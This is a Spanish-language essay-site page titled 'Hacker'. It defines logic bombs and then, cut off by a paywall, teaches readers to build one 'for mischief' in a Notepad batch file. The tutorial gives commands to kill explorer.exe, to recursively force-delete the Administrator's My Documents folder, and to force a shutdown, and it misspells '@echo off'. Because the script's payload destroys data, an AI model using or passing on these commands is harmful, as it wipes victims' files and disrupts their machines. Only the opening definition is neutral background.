Hacker

Páginas: 3 (710 palabras) Publicado: 17 de noviembre de 2014
Bomba lógica

Una bomba lógica es una parte de código insertada intencionalmente en un programa informático que permanece oculto hasta cumplirse una o más condiciones preprogramadas, en esemomento se ejecuta una acción maliciosa. Por ejemplo, un programador puede ocultar una pieza de código que comience a borrar archivos cuando sea despedido de la compañía (en un disparador de base de datos(trigger) que se dispare al cambiar la condición de trabajador activo del programador). 

El software que es inherentemente malicioso, como virus o gusanos informáticos, frecuentemente contienebombas lógicas que ejecutan algún programa en un tiempo predefinido o cuando cierta condición se cumple. Esta técnica puede ser usada por un virus o un gusano para ganar ímpetu y para esparcirse antes deser notado. Muchos virus atacan sus sistemas huéspedes en fechas específicas, tales como el viernes 13 o el April fools' day (día de los bufones de abril) o el día de los inocentes. Los troyanos que seactivan en ciertas fechas son llamados frecuentemente "bombas de tiempo". 

Para ser considerado una bomba lógica, la acción ejecutada debe ser indeseada y desconocida al usuario del software. Porejemplo los programas demos, que desactivan cierta funcionalidad después de un tiempo prefijado, no son considerados como bombas lógicas. 



Hola amigos. Me pareció buena idea para los q no sabende este mundo Hack. 
Mostrar como hacer una bomba lógica para hacer alguna travesura. 

1-primero deben abrir en bloc de notas. 
Donde escribirán las siguientes instrucciones. 

@hecho off esta instrucción se coloca al principio de toda bomba lógica. 

Taskkill /f /im (programa q se desea cerrar) 
la instrucción taskkill cierra cualquier programa q este ejecutando Windows. 
Ej.:taskkill /f /im explorer.exe 

del /s /f /q "Archivo o carpeta q se desea eliminar" 
Ej.: del /s /f /q "C:documents and SettingsAdministradorMis documentos" 

shu*** -s -f -t xx ("shu***" apaga o...
Leer documento completo

Regístrate para leer el documento completo.

Estos documentos también te pueden resultar útiles

  • hack
  • Hacker
  • Hack
  • Hacker
  • Hacker
  • hacker
  • Hacker
  • hacker

Conviértase en miembro formal de Buenas Tareas

INSCRÍBETE - ES GRATIS